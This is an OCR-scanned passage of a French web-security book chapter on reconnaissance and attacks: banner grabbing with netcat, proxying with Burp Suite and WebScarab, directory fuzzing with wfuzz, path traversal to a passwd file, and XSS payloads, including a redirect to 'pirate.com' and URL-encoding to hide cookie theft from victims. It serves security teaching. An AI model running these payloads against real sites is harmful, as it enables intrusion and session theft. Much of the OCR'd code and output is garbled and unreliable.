Quel serveur est utilisé et quelle est sa version ? 


Avoir une connaissance précise du type de serveur et de son numéro de ver- 
sion est très important car il existe des failles de sécurité référencées pour 
chacun d'eux. Il n'est pas rare de trouver cette information dans l'en-tête de 
la réponse du serveur. Une autre façon d'obtenir ces informations est de 
provoquer le renvoi de la page d'erreur, par exemple en appelant une page 
qui n'existe pas sur le serveur. Celle-ci peut être appelée dans l'URL du 
navigateur ou à l'aide d'un logiciel pour avoir le détail de l'erreur renvoyée. 
Nous pouvons utiliser par exemple Netcat : 


nc acissi.net 80 [Entrée] 
GET ../../../ HTTP/1.1 [Entrée] [Entrée] 


HTTP/1.1 400 Bad Request 

Date: Thu, 11 Jun 2009 07:04:59 GMT 
Server: Apache 

Content-Length: 226 

Connection: close 

Content-Type: text/html; charset=iso-8859-1 


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN'"> 
<html><head> 

<title>400 Bad Request</title> 

</head><body> 

<h1>Bad Request</h1> 
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</p> 


<p>Your browser sent a request that this server could not understand.<br /> 
</body></htm1> 


Le serveur d'ACISSI n'est pas très bavard mais nous voyons quand même 
que c'est un serveur Apache. D'autres sont bien plus verbeux. 


3.1.10À l'aide 


3.2 


3.2.1 


Nous constatons que tous ces tests sont longs et fastidieux mais c'est une 
bonne école. Heureusement pour nous, il existe des outils qui peuvent nous 
faciliter la vie. Un add-ons bien intéressant de Firefox est Web Developer que 
nous trouvons à l'adresse https://addons.mozilla.org/fr/firefox/addon/60. 
Une fois cet add-ons installé et Firefox redémarré nous voyons apparaître 
une nouvelle barre d'outils qui va nous permettre d'effectuer toutes les opé- 
rations que nous avons vues précédemment et bien plus encore : 

- pour les formulaires : Forms => View Form Information ; 

- pour les cookies : Cookie => View Cookie Information ; 

- pour le Javascript : Information => View Javascript ; 

- pour l'en-tête : Information => View Response Headers ; 

= eté; 

Cette nouvelle barre d'outils nous donne un accès extrêmement simplifié à 
une grande quantité d'informations. 


@Disabler Cookies? .:CSS: forms. Images *_G information: : Miscellaneous: Outlire +- $ i Resize © 4> F0ols : @Wiew Source- Options" XO oj 


Une nouvelle barre d'outils, la Web Developer 


Découvrir la face cachée d'un site Web 


Utilisation de Burp Suite 


Une technique souvent utilisée pour parfaitement maîtriser les échanges 
entre le client et le serveur consiste à placer une application entre ces deux 
entités. Pour intercepter et donc pouvoir traiter tous les échanges entre le 
navigateur et le serveur Web, les applications se positionnent comme proxy 
Web. Elles écoutent sur la boucle locale et utilisent un port particulier. 
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Il ne reste plus qu'à configurer correctement notre navigateur et le tour est 
joué. Nous nous retrouvons donc dans la situation de l'illustration sui- 
vante. 


+, Application p~~» 
Navigateur proxy local 
æ+—| 127.0.0.1:8080 |«—|---— 


Serveur 
Web 


Client 


Application se plaçant comme proxy Web 


Nous allons vous présenter Burp Suite 1.2 qui est disponible gratuitement 
en version limitée mais présente déjà beaucoup d'outils pleinement fonc- 
tionnels. Il est toujours possible d'acquérir la version professionnelle mais 
ce n'est pas utile pour ce qui sera présenté dans cet ouvrage. Nous présen- 
terons aussi d'autres outils libres pouvant remplacer certaines 
fonctionnalités de cette suite. 


Pour installer Burp Suite 1.2 il suffit de suivre les consignes disponibles 
sur http://portswigger.net/suite/ 


En quelques mots, il faut installer Java 1.5 au minimum, télécharger l'ar- 
chive proposée sur le site, la décompresser dans un dossier et lancer dans ce 
dossier la commande : 


| java -jar burpsuite vi.2.jar 
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Nous sommes alors face à la fenêtre suivante. 


burp suite v1.2 


burp imruder repemer window help 


Kierget | proxy | spider | ==ac=er | imrucer 7 repeater Y sequencer Y decoder ? comparer Ÿcomms F'aiens | 


(ste map | scopa | 


| status }_lengtn MIRE typd 


| Omatches $} 


Burp Suite 


Il nous reste à faire un dernier réglage dans notre navigateur avant de pour- 
voir utiliser cet outil. Burp Suite écoute sur le port 8080 de la boucle locale. 
Il faut donc définir l'IP 127.0.0.1 sur le port 8080 comme proxy de notre 
navigateur. Dans le menu Edition - Propriétés, de Firefox, nous trouvons 
l'icône Avancé puis l'onglet Réseau. Nous cliquons alors sur le bouton Pa- 
ramètres et nous découvrons la fenêtre ci-après qui permet d'indiquer le 
proxy à utiliser. 
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Configuration du serveur proxy pour accéder à internet 
© Pas de proxy 
O Détection automatique des paramètres de proxy pour ce réseau 
Utiliser les paramètres proxy du système 


Configuration me Manuelle du du p proxy : Re o] 


Proxy HTTP : [27 127.0.0.1 60807 


© Utiliser ce serveur proxy pour tous les nr 


Proxy SSL : | Port : 
Proxy ETP : | Port : | 


Hôte SOCKS : | i Port : 


OSOCKS v4 © SOCKS v5 


Pas de proxy pour : | 


Exemples : .mozilla.org, .asso.fr, 192.168.1.0/24 
e) Adress de configuration automatique | du prey 


R Actualiser] 


Réglage du proxy dans Firefox 


Voilà, Burp Suite est prêt à fonctionner. Rendons-nous dans l'onglet proxy 
de cette application. Nous constatons que le bouton Intercept is on est 
activé. Rendons-nous sur la page d'ACISSI avec notre navigateur préféré. 
Notre requête est interceptée par le logiciel comme le montre l'illustra- 
tion suivante. Nous devons cliquer sur Forward pour la transmettre au 
serveur. Cette interception nous permet en plus de modifier des éléments 
de la requête que nous allons faire, mais ce point sera traité ultérieurement. 
Plusieurs requêtes sont nécessaires avant d'obtenir l'affichage complet de la 
page dans notre navigateur. 
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cs 
bal 


{ target ? Proxy | spider | iiruder ” repeater | sequencer Ÿ decoder ? comparer | comms | aens | 


lf{ maarcepi l opnons | tistey } 


If cequest 10 hnp//wwaacissine:8C [BE 191.64 108) 


drop Wmaraptisen |! action 


arams | headers | hex: 
il: ES A- 
JEGET / HTTP/1 1 

E Host www adssi net 

Iff User-Agent: ozifla/5.0 %11; U; Linux x&S.84; en 
if ALERE text/html, applica 


kc,2069042605 GranFaradisc/3.0.10 


ep-alive 
j föga 19 SalsER-R5cHI9CDN sa £3a49N96 191:2 fii c062048724b2276%, 
M--tüma-107532170.5 9956605 140 261815 1244710832 1244772423 3, __utmz= 1074953170 1244701818.1.1 UUMCSI = (direc umee = (AIT SCI ILUMEMARNDNE), 
il has js= l, ..utmz=1075353170, 53170.1,10.1244772-123 

ff n-Hodined-sate Fri, LE jun 200 


© matches f 


Interception d'une requête dans Burp Suite 


Si nous nous rendons à présent dans l'onglet target, nous voyons appa- 
raître le site d'ACISSI ainsi que quelques autres lignes correspondant à des 
liens présents sur la page du site. Nous pouvons déplier la branche 
http://www.acissi.net et visualiser son arborescence. 


En effectuant un clic droit sur la branche du site nous pouvons envoyer 
l'URL dans le module scope (Add item to scope). Il est alors possible de lancer 
une recherche complète dans l'arborescence du site en se rendant dans l'on- 
glet spider et en cochant spider running. 


Si nous revenons dans l'onglet target nous voyons évoluer les éléments de 
la structure du site. Il est possible de simplifier l'affichage en ne demandant 
à voir que les éléments du domaine « acissi.net » sans les éléments externes. 
Pour cela, nous devons cliquer dans la barre filter et cocher show only 
in-scope item. Après quelques instants nous obtenons l'affichage présenté 
ci-après. 
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f sequencer | cecoder | comparer | comms { alens i 


proxy | spider #2 intruder | repemter 


I she man | scope ! 


| method) RI _—_|.status : lengh (MALE nps E 
200 HTM 


-B mie ; HTML 

DR ea f TA fa 

S| INSTSLLMy5gI.txt i A a 

[A #1STALL pgsalixt | à CEI ae 7 —+ HTML 
[A iSTALL txt  Thup: fm. Pa=user/password/ 20 61447 TNL 
[A UCENSE rt À nue wo. |Pq=user/password/. 6 ed 
[S] MAINTAINERS. ixt qu GET |aggregator "7777 |200 26272 HT d aggregator | ACI 
[A urcRADE ta http://w faggregator/ 0... 3 d aggregator | ACISI 
g admin i; ; o eyaries | acisi 

1 

a- aggregator 
+ y aguregator 
ea, 
> [D tategories | K 
Š Mj categorias f : Fri, 12 iun 2609 O2 12:43 GMT 

D spm pp Serer Apace 
$ Drss Hlas Fri, 12 Jur 2009 02.11:52 GMT 
H e z 3 2 


S Se424d75e" 
h R r55 GHT 
i- D sources 


& D sources 
$ T Comment 
+ Fi 
i à f ADOCTYFE tal PUBLIC *-;/ Y2 DIR TES 
+ Lrerty LE erirni amina s'ann: ffawna orgi 
+ Cd contaci f 
= g contact 
&- {i cron php 
D ro ir, s"ext/hinl, tharsetauti-ĝ 
2- filter ir: 2 en" applicaton/rss+ 4M titlen SCSSIRSS* hrer= hp ZANAAAGSSI NAUTIS YF 7> 
? forum 
E 1 s/defauit/files/famcen pay’ type="image? 
& 83 extar php 
D ingex.pho 


Observation du site d'ACISST avec Burp Suite 


Cet utilitaire permet d'obtenir rapidement énormément d'informations sur 
le site observé. Beaucoup plus rapidement qu'en recherchant soi-même les 
éléments un par un dans le code source. De plus, la présentation des don- 
nées en simplifie la lecture. Nous trouvons par exemple dans le volet en 
bas, à droite l'ensemble du code correspondant à une requête ou une 
réponse. Nous pouvons voir son en-tête (headers), son code HTML (html), 
son code hexadécimal (hex), sa représentation (render), etc. Nous visualisons 
aussi l'ensemble des requêtes effectuées par Burp Suite dans la zone en 
haut à droite. 


De même, dans l'onglet proxy de Burp Suite nous disposons de beaucoup 
d'outils très utiles comme différentes représentations des requêtes ou 
encore un historique. 
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Lors de l'utilisation de l'outil spider, Burp Suite balaye aussi les formulaires 
avec tous les champs qu'ils comportent. L'interception d'un formulaire pro- 
voque l'apparition d'une boîte de dialogue, comme présentée sur l'illustra- 
tion ci-dessous, nous permettant de visualiser/modifier tous les champs du 
formulaire. Burp Suite ne continuera son balayage qu'une fois le formulaire 
validé. 


submit form 


Burp Spider needs your guidance to submit a login forim. Please choose the value of each 
form field which should be used when submitting the form. You can control how Burp 
hanclles forms in the Spider options tab. 


action URL: htps://www.acissi.net/user/ 
method: POST 


| type value 
op=$e connecter 


hidden user login 


text captcha response 


text name 


hidden icaptcha_sid 


Interception d'un formulaire avec Burp Suite 


Ce comportement peut vite devenir gênant si le site contient beaucoup de 
formulaires. Mais Burp Suite dispose d'une quantité impressionnante de 
réglages que nous ne pouvons pas tous détailler dans cet ouvrage. Pour évi- 
ter d'intercepter les formulaires il faut cocher la case don't submit form 


dans l'onglet options de l'onglet spider. 


Le défaut de ce genre d'outil est que nous pouvons rapidement perdre de 
vue ce que fait exactement l'application. Il est souvent intéressant de dis- 
poser d'un outil intermédiaire permettant de nous assister mais aussi de 
garder une pleine maîtrise des requêtes faites au site analysé. 
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3.2.2 Utilisation de wfuzz 


Wfuzz est un fuzzer (fusil) orienté Web. Il est écrit en python, et bien 
qu'étant assez simple et léger, permet de rendre bien des services. Nous le 
téléchargeons à l'adresse : http://www.edge-security.com/wfuzz.php 


Pour l'installer il suffit de décompresser l'archive dans le dossier que nous 
voulons. Sous Windows nous trouvons un fichier wfuzz.exe qu'il suffira de 
lancer avec les bonnes options. Sous Linux nous avons besoin de python, 
qui est généralement déjà installé et du paquet pycurl. 


Le principe de wfuzz est d'envoyer une multitude de requêtes au serveur en 
fonction des paramètres que nous lui passons sur la ligne de commande. Il 
utilise principalement des dictionnaires pour forger les requêtes. wfuzz per- 
met de stoker les résultats de ses requêtes dans un fichier html. Pour éviter 
d'avoir un encombrement du dossier de wfuzz le mieux est d'en créer un 
spécialement pour ça. Par exemple resultats. Nous pouvons alors scanner le 
site d'ACISSI avec la commande suivante : 


python wfuzz.py -c -z file -f wordlists/common.txt --hc 404 --html 
http://acissi.net/FUZZ 2>resultats/acissi.html 


Mais attention avant de lancer cette commande. Comme nous allons 
envoyer une multitude de requêtes à un même site, et ce à une vitesse rela- 
tivement importante, le site peut vous bannir en détectant ce comporte- 
ment car un être humain ne peut pas cliquer à une vitesse aussi rapide. 


Détaillons un peu cette ligne : 

- python indique que nous souhaitons lancer un script python. Nous 
aurions aussi pu rendre wfuzz.py exécutable en activant, sous Linux, son 
bit x. 

- l'option -c indique que nous souhaitons une sortie couleur. 

l'option -z précise que le dictionnaire que nous voulons utiliser est un 

fichier. Nous aurions pu utiliser une plage de valeurs en précisant range. 

l'option -f précise l'emplacement du fichier dictionnaire, ici « word- 
lists/commontxt ». 

l'option -hc 404 précise que nous souhaitons masquer l'affichage des 

pages renvoyant l'erreur 404, nous reviendrons sur ce point. 

l'option --html indique à wfuzz de fournir ses réponses au format html. 
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- http;//acissi.net/FUZZ correspond au site que nous voulons examiner. Le 
« FUZZ » sera remplacé par chaque mot du dictionnaire indiqué, ce qui 
va provoquer une quantité importante de demandes. 

- le 2>resultats/acissi.html redirige la sortie 2, qui correspond au canal 
d'erreur, dans le fichier acissi.html du dossier résultat. Cela permet de ne 
pas avoir l'ensemble des réponses renvoyées par le serveur à l'écran mais 
de les ranger dans un fichier. 


Voilà, nous avons expliqué toutes les options passées à la ligne de com- 
mande. Nous obtenons alors un résultat qui ressemble à ceci : 


Terminal 
Eichier Edition Affichage Terminal Aide 


ER 20 W “databases" 
7L 23 W “db” 

EL 290 W ‘dba 

TE 20 W adbase" 

TE 20 N adba 

TE 20 tf “dhas” 

QUE 28 W “defautt 

7L 29 W “debug 

IL 29 8 deletion" 
EN 29 W tdemp“ 

TÈ 28 W "deros" 

ri 25 W “deptay“ 

E 29 W 'detete" 

Tt z9 "deny" 

EE 23 W “deploysent" 
TE 25 W "details" 

A n 20 W design" 

AL 29 à “des” 

TL 29 # “developement” 
PE 29 W varel 

TÉ 29 W “develop” 
EME 2e W “developmenL" 
FE z0 W ‘developers 
4 28 W “device" 

TE 25 W “dev68cgi” 
TE 29 W devices" 
AL 28 w “diag" 

FL 28 W "devs" 

RE 23 W "dial" 

7L 20 W dig’ 

PH 29 W “directory” 
FE 29 ti “dir 

PE 20 W “disk” 

7L 29 W “discavery 
TE 20 H “dispatch” 
FE 25 W 'dispatcher" 
FE 29 W “dns” 

7L 28 "ds" 


Scan du site d'ACISSI avec wfuzz 


Il peut arriver que notre commande se bloque. C'est à cause de la multi- 
tude de requêtes envoyées qui peut entraîner une réaction du site visé 
et/ou une perturbation de notre connexion Internet. Cette technique de 
fuzzing doit plutôt être utilisée pour tester des sites en interne. Par 
exemple sur un intranet ou sur notre machine locale avant publication. 
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Nous ne trouvons pas grand-chose sur le site d'ACISSI et n'avons que des 
retours 301. Wfuzz affiche en effet le code renvoyé par le serveur ainsi que 
le nombre de lignes et de mots qu'il trouve sur la page renvoyée. Nous 
voyons qu'il est très important de connaître les codes HTTP que peut ren- 
voyer le serveur. Voici les principaux : 
- 1xx : information 

- 100 : attente de la suite de la requête 
+ 2HK 4 SUCCES 

- 200 : requête traitée avec succès 
= xX : redirection 

- 301 : document déplacé de façon permanente 

- 302 : document déplacé de façon temporaire 

- 304 : document non-modifié depuis la dernière requête 
- 4xx : erreur du client 

- 400 : la syntaxe de la requête est erronée 

- 403 : refus de traitement de la requête 

- 404 : document non trouvé 
408 : temps d'attente d'une réponse du serveur écoulé 
- 5xx : erreur du serveur 

- 500 : erreur interne du serveur 


Toutes ces erreurs sont documentées dans la norme HTTP qui correspond 
à la rfc2616 se trouvant à l'adresse suivante : 
http://www.w3.org/Protocols/rfc2616/rfc2616.html 


Nous constatons que le site n'est pas facile à examiner, probablement parce 
qu'il est bien configuré, ce qui est la moindre des choses. Comme il est 
totalement illégal d'attaquer un site Web sans une autorisation préalable, le 
mieux est d'installer son propre site sur sa machine locale afin d'appréhen- 
der les outils et techniques d'attaques/défenses en toute légalité. 


Nous choisissons une configuration Apache/PHP/MySQL sur laquelle nous 
installerons un forum. Nous avons choisi fogforum dont le site se trouve à 
l'adresse http://fog.daviveno.org/. Il en existe beaucoup d'autres mais il 
faut bien en choisir un. Pour installer Apache, PHP et MySQL il faut suivre 
la documentation correspondant au système d'exploitation. 
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Il faut avouer que c'est enfantin sous Linux Debian Lenny, une console en 
root et quatre commandes plus loin, c'est fini : 


apt-get install apache2 

apt-get install php5 

apt-get insatall mysql-server-5.0 
apt-get install php5-mysql 


Même si nous aborderons quelques éléments de la configuration d'Apache 
dans la partie Contre-mesures et conseils de sécurisation, nous ne pouvons 
pas expliquer ici l'installation de ce type de serveur sur tous les systèmes 
existants. Néanmoins, une solution simple est envisageable pour les amou- 
reux de Windows, c'est l'utilisation de suites qui intègrent tout, comme 
WAMP disponible à l'adresse http://www.wampserver.com/en/ ou encore 
EasyPHP disponible à l'adresse http://www.easyphporg/ 


L'installation du forum est relativement simple. Après avoir téléchargé 
l'archive à l'adresse suivante : 
http://freefr.dl.sourceforge.net/sourceforge/fog-forum/fogforum-0.8.1.tar.gz, 
nous effectuons une extraction des fichiers avec la commande suivante : 


|] tar xvzf fogforum-0.8.1.tar.gz 


Là encore c'est une commande Linux, probablement parce que la majorité 
des serveurs Web se trouve sur ce système. Mais il existe aussi des versions 
de l'archive au format zip. Ensuite nous nous rendons avec notre naviga- 
teur à l'adresse locale où nous avons placé les fichiers de l'archive, dans 
notre cas : 

http://localhost/fog/install.php. Nous sommes alors face à la page d'instal- 
lation du forum. Nous remplissons les champs et suivons les consignes 
pour régler les droits. Deux plages plus tard notre forum est fonctionnel. 

Il ne reste plus quà créer le compte administrateur. 
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Nous sommes à présent totalement libre de lancer toutes les requêtes que 
nous souhaitons sur notre forum sans risque. Reprenons un balayage des 
dossiers comme précédemment sur le site d'ACISSI avec la commande 
suivante : 


python wfuzz.py -c -z file -f wordlists/big.txt --hc 404 --html 
localhost/fog/FUZZ 2>fog scanl.html 


Nous obtenons le résultat de l'illustration suivante qui fait apparaître des 
pages consultables (code 200) des redirections (code 301 et 302). 


D TE TT NS EE E I S 


hours goes to: Trompati,Daniel H, and the 52isec Team. 
Lodejélenny:"/Desktop/kfuzz-1.45 python ufuzz.py -c -z file -f uordlists/big.txt --ho 404 --html locslhost/fog/FU2Z 2foz_scent.hiri | 


RE RS RE ARE 


+ Hfuzz 1.4 - The web brutefercer 
* 


* Carios del ojo 
* - cdslojoéedge-security.con 
* Christian Hartoreila 

* - crartorellatedge-se: 
PTPATON TETE TI ECTEETTSEE EE 


x 
* 
* Coded by: “ 
* 
* 


ity con * 
rare 


Target: lucalhost/fog/FUZZ 
Faylcad type: File 


"update" 
“uizard" 


sktop/xfuzz-1.45 J 


Scan du fog forum sans récursivité 


Nous pouvons aller plus loin dans l'arborescence, par exemple deux niveaux 
en ajoutant l'option -R 2: 


python wfuzz.py -c -z file -f wordlists/big.txt --hc 404 --html -R 
2 localhost/fog/FUZZ 2>fog scani.html 


Cette commande peut prendre beaucoup de temps car toutes les combinai- 
sons possibles avec les mots du dictionnaire sont testées avec une récursivi- 
té de 2. 
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Cette illustration présente un extrait des résultats. 


MT DENTS 


02784: C=391 CRE 31 W "tmp" 
02844: C=391 9L 31 W “update” 
03037: C=20Q OL CAN "wizard" 


03736 C S 31 W "//config" 
03868 € SoN E 708 W AP 

04441 G 151 L 510 wW "//install" 
04534 C=: SE 31 W "Fea 
04655 G CRE 31 U "//libe" 
05121 C: YE 31 W "//php" 
05254 E 387 L 708 W "“//index" 
05296: C 63L 522 "//readme" 
05794 G gi 31 "//tmp" 
05886 C CHE 31 W "//update" 
06079 t 14 L 59 W "config//" 
06252 c OL (0) "//wizard" 
09113 G ag 12 y "sr" 
10489 C TE 12 W "js/index" 
12146 C=2 yio a A 104 “libs//" 
12952 C CNE 31 “libs/db" 
15185 G CAS 53 "php//" 
15319 € CE 31 W “php/admin" 
16133: C Du 19 W "php/edit" 
16570: C 6L 53 "php/index" 
16807: C 9 L 31 "php/list" 
16833: G 2L 19 W "php/login" 
17324: C 2L 19 W “"php/post" 
17606 G 2L 19 4 "php/search" 
17774: C 6L 58 W "php/stats" 
18218 Ẹ EFL 49 W “tmp//" 
21271 C= 23L 150 “"update//" 


codej@lenny: -/Desktopy @- 


Extrait du scan du fog forum avec une récursivité de 2 


Nous pouvons ouvrir dans notre navigateur le fichier qui centralise les 
résultats de la commande grâce à la redirection. Un exemple est présenté 
ci-après. 
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| gle Edt view Hato focimaks poh Help 
le S- © @ À [E nenhmeodeDeskopmiu 1 éfg scan hum x | E feg forum 


BJ Most istede @ Getting Started jLatest Headines Y 
Mocahcsthogmhpstats 2: Fle Hhomex- fog scant htmi M 


Rapport html réalisé par wfuzz 


La découverte de dossiers et pages dont nous ne soupçonnions pas l'exis- 
tence permet d'avancer dans l'étude du site en demandant un affichage de 
ceux-ci à notre navigateur. À titre d'exemple nous découvrons sur notre 
forum une réponse avec un code 200 pour le chemin php/stats. Si nous 
nous rendons à cette adresse, cela provoque une erreur qui nous renseigne 


sur la structure du site. 


Warning: include(FOG DIRlibs/required/lib.get topics.inc) 
[function.include]: failed to open stream: No such file or 
directory in /home/codej/fog/forum/php/stats.php on line 25 


Nous voyons qu'il est recherché un dossier libs/required qui doit contenir 
des fichiers inc. Cette information peut être très intéressante pas la suite. 
Souvent la configuration des forums est enregistrée dans des fichiers inc. 
Or, nous voyons que nous avons aussi une réponse positive sur un dossier 
config. Si nous demandons à afficher dans l'URL du navigateur le fichier 
d'adresse 

http://localhost/fog/config/config.inc, c'est toute notre configuration qui 
apparaît avec les identifications de la base de données. Probablement que 
nous n'avons pas bien respecté les consignes d'installation qui devaient 


nous avertir de ne pas laisser ce fichier accessible. 


© Editions ENI - Toute reproduction interdite 


3.3 


Les failles Web 


Chapitre 6 


Wfuzz permet aussi de rechercher des éléments possédant un index numé- 
rique comme des images ou des fichiers de sauvegarde. Cette fois c'est l'op- 
tion -z range qu'il faut utiliser. L'option -r permet de préciser la plage de 
valeurs. Nous aurons l'occasion de reparler de cette option un peu plus 
tard. 


Analyser les informations récupérées 


La récolte d'informations que nous venons de faire permet de mettre en 
place des stratégies d'attaque pour contrôler la robustesse d'un site. Voici 
une liste, non exhaustive, des possibilités d'attaque suivant les informa- 
tions récoltées : 


Si le site est en JSP et fait appel directement à des fonctions dans l'URL, 

nous pouvons tenter d'utiliser d'autres fonctions non autorisées. 

Si le site est un CMS et que nous connaissons sa version, nous pouvons 

rechercher sur Internet si des failles connues existent pour cette version 

ou si des fichiers de configuration sont à protéger. 

Si le site dispose d'un formulaire d'authentification nous pouvons : 

- Tenter de modifier les champs cachés. 

- Faire du « brut forcing » s'il n'y a pas de protection par «captcha » (forme 
de test de Turing permettant de différencier de manière automatisée 
un utilisateur humain d'un ordinateur.) 

- Injecter des chaînes de codes. 

Si le site utilise du Javascript nous pouvons : 

- Appeler des fonctions en modifiant des paramètres, 

- Analyser des fonctions de cryptage de mot de passe. 

Si le site autorise le dépôt de fichiers, nous pouvons tenter de déposer des 

fichiers dont le type MIME n'est pas autorisé et par là, faire exécuter du 

code sur le serveur. 

Si le site fait appel à des sessions, nous pouvons analyser la méthode 

d'identification et tenter de la contourner par : 

- modification des cookies ; 

- modification de l'en-tête ; 

modification des champs cachés des formulaires ; 

injection SQL. 
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- Si le site autorise l'internaute à déposer un message, comme sur un 
forum par exemple, nous pouvons tenter de placer du code javascript 
dans le message pour recueillir d'autres informations ou voler une 
session. 

- Si le site affiche des élément présents dans l'URL, nous pouvons comme 
précédemment tenter d'injecter du code Javascript. 

- Si le site propose une fonction de « mot de passe oublié » nous pouvons 
analyser son fonctionnement. 

= EtG, 


Il est difficile de détailler toutes les possibilités, il faudrait un ouvrage 
entier, et encore. Nous nous consacrerons donc à des exemples courants, il- 
lustrant les différentes pistes évoquées et donnant déjà une bonne maîtrise 
des possibilités d'attaque. 


Passer à l'attaque d'un site Web 


Envoyer des données non attendues 


Principes et outils 


Lors de la conception d'un site Web, le programmeur se focalise souvent 
sur l'aspect fonctionnel du site. Il attend donc un comportement de l'utili- 
sateur et ne teste pas toujours l'ensemble des données qu'il reçoit, considé- 
rant qu'elles sont conformes. Mais comme nous l'avons déjà vu, nous pou- 
vons placer entre le navigateur et le serveur des applications capables 
d'intercepter toutes les données qui s'échangent. Burp Suite possède ces 
fonctionnalités mais est parfois complexe d'utilisation. Il existe d'autres 
applications adaptées à ce genre d'attaques comme WebScarab que nous 
trouvons à l'adresse suivante : 

http://www.owasp.org/index. php/Category: OWASP_WebScarab_ Project. 
Là encore c'est une application en java et nous choisissons d'utiliser la ver- 
sion se/fcontained que nous lancerons avec la commande suivante : 


[| java -jar webscarab-selfcontained-20070504-1631. jar 
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Comme pour Burp Suite, WebScarab se place entre le navigateur et le ser- 
veur. Il utilise de même les fonctionnalités de proxy. Il écoute sur le port 
8008 de l'IP 127.0.0.1, le port est différent de celui de Burp Suite. Si nous 
souhaitons passer facilement de l'un à l'autre lors de l'audit d'un site il 
devient vite fastidieux de changer les paramétrages du proxy. Heureuse- 
ment pour nous, Firefox regorge de petits add-ons bien sympathiques. Nous 
installons switchproxy tool disponible à l'adresse suivante : 
https://addons.mozilla.org/en-US/firefox/addon/125 


Cet add-on fait apparaître, en bas, à droite de notre navigateur une zone 
marquée Proxy : Aucun. Un clic droit sur cette zone nous donne la possi- 
bilité de régler les Préférences et de proposer une liste de proxys. Nous 
réglons un proxy pour Burp Suite et un pour WebScarab. Nous aurons ainsi 
la possibilité de passer de l'un à l'autre en deux clics. 


Intéressons-nous à WebScarab à présent. Et voyons comment il se com- 
porte avec notre forum fog. Une fois lancé et le proxy réglé, il mémorise 
par défaut toutes les requêtes GET et intercepte les requêtes POST. Sur 
l'illustration suivante, nous voyons comment les informations sont 
présentées. 
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206 OK L [ 
fa GET, 404 Not F.. P G 
foiGET 200 OK š D 


| Parameters! Status Origin JSet-Cookie!_ Cookie 
GET inttp.//loc…. :/fog/ 1200 OK Proxy lfog.FOGS.. ifog FOGS. 
+ E 
ihttp://loc... :/f09/ 


06/..IGET 1200 OK FOGS 


HOM 


WebStarab Die E 


WebScarab 


Dans l'onglet Intercept nous avons la possibilité de régler la méthode que 
nous souhaitons intercepter. Nous avons vu que deux principales (GET et 
POST) sont utilisées mais il en existe d'autres. Si nous demandons à Web- 
Scarab d'intercepter les méthodes GET et que nous appelons la page d'ac- 
cueil de notre forum, la requête est bloquée. WebScarab demande alors ce 
qu'il doit faire avec cette requête (cf. illustration ci-après). Nous avons la 
possibilité de la transmettre sans modification ou d'en modifier le contenu 
avant transmission. 
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His Edt View History 3 Edit Request 

TEAS 

“6 - 9 © à. 
Parsed | Raw 

ÉaMost Visited” #@Getti men 


Proxy. webscarab -j : L oi es sl 
SV à Í 


x. nl i 
Birra «DNS P Delete 


Intercept requests: G intercept responses: [3 


Insert 


t Lexique 


Postion Fol1}213i4steirieolAleICIDIElE| Sting 


» Questions-séponses 


Cancel ALL inte 


Interception d'une requête GET avec WebScarab 


Nous pouvons par exemple modifier la chaîne d'identification de notre 
navigateur, en la remplaçant par Windoz pour provoquer une faute. Si 
nous faisons cette opération en nous rendant sur le site de la CNIL dans la 
rubrique Vos traces - Démonstration - Votre configuration, nous 
voyons que le site ne peut plus identifier notre navigateur. 


4.1.2 Utilisation de l'URL 


Une des attaques les plus simples consiste à modifier l'URL renvoyée par le 
navigateur au serveur lors du clic sur un lien. En analysant le contenu de 
l'URE nous pouvons modifier les données des variables qui doivent norma- 
lement être transmises. Cette attaque ne nécessite aucun outil particulier, 
mais nous pouvons nous faire aider par certains pour multiplier les essais 
de façon automatique. 
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Voici quelques exemples d'attaques : 

- Chercher si une variable du genre admin=0 ou user=user n'est pas pré- 
sente et faire des modifications du style admin=1 ou user=admin. Si cette 
technique semble enfantine, il arrive de trouver encore ce genre de failles 
même si elles tendent à disparaître. 

- Regarder si le site n'utilise pas l'inclusion d'un fichier dans l'URL. C'est 
une méthode qui permet de simplifier la vie du programmeur en passant 
dans une variable le nom du fichier à inclure dans la page. Si nous trou- 
vons des éléments du genre « page=presentation.html » il y a de fortes 
chances que la technique d'inclusion de fichier soit utilisée. Nous pou- 
vons alors tenter de remonter dans l'arborescence du serveur pour faire 
afficher des données non autorisées comme ./././././././passwd. Si ce 
fichier s'affiche nous avons la liste des comptes sur le serveur, il ne reste 
plus qu'à tester des mots de passe. 

- Analyser si des images ou des pages ne sont pas affichées en se basant 
sur un identifiant du type id=12 et tenter de balayer tous les id, même 
ceux non accessibles par un lien sur le site. Nous pouvons utiliser wfuzz 
pour multiplier les requêtes avec l'option -z range -r. Par exemple : 


python wfuzz.py -c -z range =r &-100 --hc 404 --htmi 
http://localhost/fog/index.php?fog forumid=FUZZ 2>fog scanl.html 


- Vérifier si une variable ne contient pas du texte qui sera affiché dans la 
page. Si c'est le cas, nous pouvons tenter de faire exécuter du javascript. 
Un test simple consiste à placer le code <script>alert 
('test')</script>. Si ce code déclenche l'apparition d'une boîte 
d'alerte, c'est que le Javascript est exécuté. Nous pouvons alors peut-être 


rediriger la page vers un autre site avec le code suivant : 


A <script>document .location=http://pirate.com</script> 


Cette faille peut être utilisée pour envoyer un lien à un usager qui pense 
accéder à un certain site, celui de sa banque par exemple, et sera redirigé 
sur un autre. Pour éviter d'éveiller une certaine méfiance chez la victime à 
la lecture de l'URL, il est facile d'encoder les caractères en ASCII. Le « < » 
deviendra un « %3C », le « > » un « %3E », etc. La victime ne verra donc 
plus de Javascript dans l'URL mais une succession de codes comme nous 


pouvons le rencontrer couramment dans les adresses de site. 


© Editions ENI - Toute reproduction interdite 


Les failles Web 
Chapitre 6 223 


Par exemple la chaîne <script>alert (document.cookie) 
</script> devient 
« %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63 %75 
Abd %65 %be%74%2e W63 6f 606069 %65 %2I%3c%2f%73%63%72%69%7 
0%74%3e ». 
Il existe bon nombre de scripts sur Internet permettant cet encodage. 
Voici le code source d'un petit programme en C qui permet aussi de le 
faire : 


#include <stdio.h> 
#include <string.h> 
int main() 
{ 
DL pi EPS D 
char chaine{1000)]; 
char p=37; 
printf("Saisir la chaine à encoder : "); 
scanf("%s",chaine); 
for (i=0;i<strlen(chaine);it++) 
{ 


printf("$céx",p,chainelil]); 


printf("\n\n"); 
return 0; 


f. 


Mais actuellement les URL sont filtrées et si nous pouvons encore trouver 
ce genre de failles, elles se font rares. Une façon de contourner le filtre est 
de placer une « iframe ». Dans ce cas nous incluons dans la page une zone 
